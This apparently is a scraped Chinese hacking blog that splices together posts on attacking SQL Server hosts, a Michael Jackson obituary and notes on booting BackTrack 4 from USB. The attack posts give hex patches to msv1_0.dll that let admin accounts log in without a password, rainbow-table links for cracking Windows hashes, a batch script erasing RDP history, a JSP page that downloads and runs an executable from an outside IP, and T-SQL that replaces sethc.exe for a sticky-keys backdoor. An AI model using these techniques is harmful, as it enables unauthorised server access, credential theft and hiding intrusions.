Chinadu`s Blog

这个用起来很爽，扩展功能不是一般的强大

1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门.

2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer findpass gethashs ipc$猜web密码 vbs读系统日志查看管理员登陆IP 有可能的话导出注册表的secpol查看策略规则.


3.web,sql分离(sql上网),dbo_owner. 猜密码进web后台. 备份hta到启动项

4.web,sql分离(sql不上网),dbo_owner.猜密码进web后台.

(重点在4,在opendatasource的时候不要以为弹不到外面的1433就不上网了,可以尝试其他的端口 比如20 21 25 443 445 80等防火墙经常开放的端口)

来源：7jdg’s blog

这东西再放都长毛了,放出来….精灵还写了个利用工具,找不到了.回头补上..

ystem32下 有个msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D

2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF

vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D

都是前两个字节改为
E0 00

全部管理员帐号无须密码登陆
包括远程登陆的

改两个目录的 msv1_0.dll 用16进制
dir /s c:\windows\msv1_0.dll

PS:最近在搞彩虹表

上次那个只能到92%，现在修复了可以下载100%

彩虹表 详细介绍（来源赛迪网）：
http://tech.ccidnet.com/art/237/20070913/1211093_1.html

彩虹表的使用教程：
http://www.3800hk.com/donghua/f/25542.html

彩虹表 官方下载地址：
http://ophcrack.sourceforge.net/

大家需要做的就是下载下面两个东西
1、ophcrack All platforms
2、ophcrack LiveCDNo installation
第一个是XP平台上运行的软件 ophcrack-win32-installer-3.0.1.exe
第二个是LiveCD，你可以用这张CD引导系统，在Linux环境下自动识别windows系统并且破解登陆密码 ophcrack-xp-livecd-2.0.1.iso


>> 关于彩虹表的使用
[RainbowCrack + LM Tables 破解SAM密码]
http://www.t00ls.net/viewthread.php?tid=505

[SAMInside + LM Tables 破解SAM密码完美组合]
http://www.t00ls.net/viewthread.php?tid=503


最小彩虹表是最基本的字母数字表，就这样它的大小就有388MB。这是Ophcrack启动盘默认的表，很多人的收集便有了传说中的120G的彩虹表。

120G彩虹表HTTP下载
http://www.t00ls.net/viewthread.php?tid=474

下载地址1 Http://hash.0×54.com 铁通
下载地址2 Http://hash2.0×54.com 电信
备用地址1 Http://hash.t00ls.net 铁通
备用地址2 Http://hash2.t00ls.net 电信


点击下载此文件

原文网址：http://www.upx8.com/article.asp?id=271

http://www.upx8.com/article.asp?id=271

地址是国外的，很好很强大，需要的硬盘也很大， ~！
md5,sha1,lm-hash,nt-hash都在里面。

ciscopix_mixalpha-numeric-all-space_1-6
halflmchall_alpha-numeric_1-7
lm_all_1-7
lm_alpha-numeric_1-7
lm_alpha_1-7
lm_alpha_numeric_1-7


md5_loweralpha-numeric_1-8
md5_loweralpha-space_1-9
md5_mixalpha-numeric-all-space_1-6
md5_mixalpha-numeric-space_1-7
md5_numeric_1-12
mscache_mixalpha-numeric-all-space_1-6
ntlm_loweralpha-numeric-space_1-8
ntlm_loweralpha-space_1-9
ntlm_loweralpha_1-9
ntlm_mixalpha-numeric-all-space_1-6_perfect

下载地址：http://rainbowtables.ddl.cx/

lm_all-space#1-7
lm_alpha-numeric#1-7
md5_alpha-numeric-space#1-8
md5_alpha-space#1-9
md5_hybrid(loweralpha#6-6,numeric#1-3)
md5_hybrid(loweralpha#7-7,numeric#1-3)
md5_loweralpha-numeric-space#1-8
md5_loweralpha-numeric-symbol32-space#1-7
md5_loweralpha-space#1-9
md5_mixalpha-numeric-all-space#1-6
md5_mixalpha-numeric-space#1-7
md5_numeric#1-12
ntlm_alpha-numeric-space#1-8
ntlm_alpha-space#1-9
ntlm_hybrid(loweralpha#6-6,numeric#1-3)
ntlm_loweralpha-numeric-space#1-8
ntlm_loweralpha-numeric-symbol32-space#1-7
ntlm_loweralpha-space#1-9
ntlm_mixalpha-numeric-all-space#1-6
ntlm_mixalpha-numeric-space#1-7
ntlm_numeric#1-12
fastlm_alpha-numeric#1-7
halflmchall_alpha-numeric#1-7
sha1_loweralpha-numeric-space#1-8
sha1_loweralpha-space#1-9
sha1_mixalpha-numeric#1-7
sha1_numeric#1-12

下载地址：http://tbhost.eu/rt.php

新华网6月26日报道 美国著名流行歌星迈克尔·杰克逊２５日因心脏病发作在洛杉矶的一家医院去世。

美国《洛杉矶时报》网站援引当地警方的消息称，杰克逊当天下午因心脏病发作深度昏迷被送入洛杉矶加州大学医疗中心，不久该中心的医生正式宣布这位５０岁的前流行乐坛巨星不治身亡。

另据中国网报道美联社、洛杉矶时报等多家外媒消息，北京时间26日5:26(洛杉矶当地时间25日14:26）左右，著名歌星迈克尔-杰克逊因心搏停止在送往医院后死亡。

据CNN信源称，现年50岁的杰克逊在送往医院后一直处于昏迷状态。当地验尸官随后宣布杰克逊在洛杉矶当地时间25日14:26（北京时间26日5:26）死亡。

杰克逊的家庭律师布赖恩-奥克斯曼称，迈克尔-杰克逊的兄弟兰迪-杰克逊告诉他杰克逊实在美国时间周四早晨在西洛杉矶病倒的。目前，杰克逊家人都已得到了该消息，他们或已在医院或赶往医院的路上。在医疗中心，所有通往急诊室的入口都被保安人员封住了。甚至不允许医院的工作人员进入。有几个人站在候诊区内，其中一些人在哭泣。

据急救人员史蒂夫-鲁达说,他们在洛杉矶当地时间25日12:21（北京时间26日3:21）接到西洛杉矶的紧急电话。他说杰克逊得到治疗并被转送到加利福尼亚大学洛杉矶分校医疗中心。当被问及病人的具体病情时，他称，根据联邦隐私法，他不能谈论此话题。

杰克逊–这位印地安纳加里的音乐偶像，被称为“流行音乐之王”。他有许多一流的经典曲目，“Thriller”是其中最畅销的专辑之一。据悉，他出生在一个有九个孩子的著名音乐家庭，排行第七。他有三个孩子，迈克尔王子一世、帕里斯和迈克尔王子二世。

个人资料

全 名：Michael Joseph Jackson

中译名：迈克尔·约瑟夫·杰克逊

其他译名：台湾译名：麦可·杰克森；香港译名：米高积逊 ；米高积臣

简称：MJ。

血型：A型

出生日期：1958年8月29日中午12:13

身高：179cm

星座：处女座

出生地点：美国 印第安纳州 加里市 Jackson街21号(Gary, Indiana, USA)

主要音乐风格：新杰克摇摆舞曲(New Jack Swing)，俱乐部舞曲(Club/Dance)，流行/摇滚(Pop/Rock)，摩顿黑人音乐(Motown)，都市流行(Urban)，放克(Funk)，节奏布鲁斯(R&B)

主要歌唱特色：假声，痉挛，活力，热情，伤感，警醒，快乐，自信，丰富，时髦，真诚，盛典，神秘，口技

主要舞蹈风格：机械舞、踢踏舞、霹雳舞、现代舞、太空步

个人简历

迈克尔·杰克逊（Michael Jackson）被誉为流行音乐之王（the King of Pop），是继猫王之后西方流行乐坛最具影响力的音乐家,其成就已超越猫王，是出色的音乐全才，在作词，作曲，场景制作，编曲，演唱，舞蹈，乐器演奏方面都有着卓越的成就。

迈克尔与猫王、披头士两组歌手并列为流行乐史上最伟大的不朽象征，他开创了现代MTV，他把流行音乐推向了巅峰，他融合了黑人节奏蓝调与白人摇滚的独特的MJ乐风，时而高亢愤疾、时而柔美灵动的声音，空前绝后的高水准音乐录影，规模宏大的演唱会无不在世界各地引起极大轰动. 他拥有世界销量第一的专辑《THRILLER》，销量达1.04亿（2006年吉尼斯世界纪录认证数据）。

据2006年底统计，其正版专辑全球销量已超过7.5亿，被载入“吉尼斯世界记录大全”。他是音乐史上第一位在美国以外卖出上亿张唱片的艺术家。他魔幻般的舞步更是让无数的明星效仿。2006年，吉尼斯世界纪录颁发了一个最新认证：世界历史上最成功的艺术家！ 他一个人支持了世界上39个慈善救助基金会，保持着2006年的吉尼斯世界个人慈善纪录，是全世界以个人名义捐助慈善事业最多的人。他患有白癜风皮肤病，皮肤呈白色.

刚才成功的把BT4(bt4-pre-final版基于ubuntu的linux)装入优盘并启动成功，现把一点体会与大家共享，不会装的可以参照，高手就请指教了。
本人也是在琢摸了好几天才搞清楚，之前的bt3都是采用syslinux引导的。在安装bt3时先用ultraiso软件把下载的bt3镜像文件（iso）装入优盘，然后dos下执行syslinux
X：完成的（X为优盘）安装。

这次去本站给的链接一天时间下载了巨大的bt4-pre-final.iso文件，有1.3G。照以前的办法引导失败了！！又按照bt4使用说明的提示下载unetbootin软件，图形化界面，执行镜像导入，但是进入屏幕后一片漆黑什么都没有，等了半个小时也是这样。
遂查询原因，发现里面boot\目录有个grub文件夹，猜想应该是用grub方式引导的。于是有了本文以下的办法：
一、 准备工作：

1、下载grub4dos软件最新版；

2、下载command、io.sys、msdos.sys三个dos引导文件；（网上到处都是）

3、用ultraiso把bt4-pre-final.iso中的boot、casper文件夹提取出来放在一边备用；（用winrar应该也行）
4、下载惠普的格式化工具HPUSBFW（小巧实用，网上很多）/不想下载的话直接用ultraiso也应该一样；
二、步骤：
一般来说实现grub4dos优盘引导有两种办法：dos方式（IO）进入grub和mbr方式进入grub。据说mbr方式速度快、兼容性好，但由于需要使用bootlace.com命令或grubinst有图形界面的程序完成，一来本人不熟悉，二来担心改了mbr以后麻烦。所以采用的是dos引导方式。
1、照着提示，用惠普格式化工具HPUSBFW把command、io.sys、msdos.sys三个dos系统文件格式化方式写入优盘；（或者ultraiso也行）
2、把grub4dos压缩包解压缩，里面的文件拷入优盘根目录（其实并不需要全部，但总共也不多，懒得挑拣，其实grldr、grub.exe、menu.lst就够了）；
3、把刚才提取的boot、casper两个文件夹拷贝进优盘根目录下；
4、用boot\grub目录下的文件menu.lst替换优盘根目录下的同名文件（即grub4dos中的menu.lst文件演示版）。
其实高手可以自行编写menu.lst文件，也不是很复杂，但既然下载的版本里面提供了，我就不多此一举了。
三、结果
（可能我下的三个dos系统文件缘故）开机之后首先一闪win98界面（我小时候熟悉的），然后有按空格键的提示，不管它。稍等片刻进入dos命令提示符（我的是c盘），输入grub，进入bt4选择界面，好几条，什么像素等等，我选1024*什么的。马上进入bt4的linux命令行界面，输入startx进入图形化界面，接下来就可以用鼠标操作了。

四、关于引导:
1、之前使用winpe的好几个版本镜像，都是直接用ultraiso写入优盘就可以了。但不知何故bt3就不行，winpe镜像好像也是用syslinux引导的，是不是把syslinux命令生成的ldlinux.sys（记得是这个）文件一起并入iso镜像就可以了呢？本人没试过，希望知道的朋友告诉一声。
2、用同样的办法制作dvdrw引导盘应该也可以的；
3、menu.lst命令，在下载的boot\grub文件夹中同名文件menu.lst参照这个就可以了，在此基础上改背景、增加功能什么的都比较方便；

BT4 pre final 试用随笔

BT4 pre final以超大的体积1.3G亮相，估计让很多人都吃惊！核心架构，运行方法和操作方式完全和
ubuntu靠拢。拥有自行维护的软件仓库，也可以使用ubuntu源的软件仓库，开发团队也不再推荐用
光盘live cd的形式来运行BT4 pre final,鼓励大家把BackTrack当成一个真正的linux发行版本，
真正安装到硬盘上作为一个桌面系统来使用，而不是仅仅局限于使用里面的网络安全工具软件。
至少，也要用U盘来运行，这样也可以保存系统的更新和改动的数据。

BT4 pre final放弃了lzma,也放弃了slax最为骄傲的加载模块的方式–lzm文件包，这对live cd的使用影响是巨
大的，无法方便地加载模块了!对linux老手来说，这并没有什么困难。但对很多linux新手来说，要从把lzm包
简单拷贝到modules目录下的习惯转变到使用apt-get和deb包的安装，则是一个稍微有点儿痛苦的过程。想要
方便的加载驱动模块就不是那么轻松的事情了。

BT4 pre final转向了apt-get在线更新系统和软件的方式，如果单独安装deb包，只能使用dpkg的命令方式，
而没有集成dpkg的图形界面gdebi。当然这些都可以从ubuntu众多的教程中找到解决方法。
BT4 pre final核心架构变化的最大好处就是大量的ubuntu资源和方法可以利用。

下面来说说无线网卡的驱动问题：
1.没有集成瑞银最新的firmware文件，使得部分版本的瑞银无法正常抓包注入，连wl5061s也要假死。
2.集成了rt3070L、rt2070L的驱动，但没有集成firmware文件，需要自行拷贝firmware文件，
才可以正常联网，当然，这个驱动是不支持抓包注入的ralink官方驱动。
3.支持水星MW54U,也就是可以直接支持tp-link wn322g+（zd1211b+uw2453）.

下面是一些使用情况：
1.进入BT4 pre final的live CD，不用输入帐户密码，缺省以root登录，startx进入到KDE图形桌面。
2.由wlanbbs的summerlucky制作的BT4 beta中使用的中文包，转化为deb包安装后，在bt4 pre final中
可以使用，中文显示正常，只是小企鹅输入法 fcitx不能使用，似乎是找不到字库，可能需要设置。

本论坛中发布的BT4 beta的中文包，也可以在BT4 pre final中使用，但也是输入法不能使用。
当然apt-get来安装中文包是标准的做法。
3.spoonwep2也可正常在BT4 pre final中使用，不存在bt4 beta中的问题。
4.可以用grub在硬盘上以live CD的方式启动运行BT4 pre final,进入系统后，bt4映像文件所在的分区识别为cdrom,不可写。
5.集成了wicd网络设置配置工具，取代了ubuntu和BT4 beta中使用的NetworkManager.
6.BT4 pre final集成的网络安全工具软件同以前版本一样的丰富，毋庸置疑，功能是强大的，你需要的不需要的都会在里面找到。

结束语
1.如果仅仅是获取无线路由的密码，没有必要使用BT4 pre final。
2.最好把BT4 pre final真正安装到硬盘使用，使用U盘可保存更新和数据变化的live cd方式运行，
也是很好的方法。
3.BT4 pre final可以用ubunut intrepid源的软件包，那么ubuntu 肯定也以用BT4 pre final源中的软件包。
玩ubuntu的朋友可以测试一下是否可行。

@echo off
@reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f
@del “%USERPROFILE%\My Documents\Default.rdp” /a
@exit

/va 删除项下面所有键值

/f不提示

/a 删除隐藏文件

保存为批处理。运行即可。

代码如下：

<%@ page import="java.io.*, java.net.*" %>    
<%     
try {    
    //String exe = request.getParameter("exe");    
    String urlname = "http://58.103.196.210:8080/webdav/ip.exe";    
    URL url = new URL(urlname);    
    URLConnection conn = url.openConnection();    
    String filename = new String("caa.exe");    
    FileOutputStream outf = new FileOutputStream(filename);    
    conn.setDoInput(true);    
    InputStream inStream = conn.getInputStream();    
    BufferedInputStream input = new BufferedInputStream(inStream);    
    byte[] b = new byte[1024];    
    int a = 0;    
    while((a = input.read(b,0,b.length)) != -1){    
        outf.write(b,0,a);    
    }    
    outf.flush();    
    input.close();    
    outf.close();    
   
    //run the exe    
    Process child = Runtime.getRuntime().exec(filename);    
}    
    catch (IOException e){     
    System.err.println(e);     
}     
%>   


有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate ‘wscript.shell’也没办法的情况下。。可用此方法
（很多服务器都把’wscript.shell’给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄’wscript.shell’或者scripting.filesystemobject
网上看到的文章都只有几个用法就是’wscript.shell’执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。
上网找了些资料，得到下面方法：
复制文件：

declare @o int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’ ,’c:\windows\system32\sethc.exe’;

declare @oo int
exec sp_oacreate ’scripting.filesystemobject’, @oo out
exec sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\sethc.exe’ ,’c:\windows\system32\dllcache\sethc.exe’;

成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑”右键”管理” 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。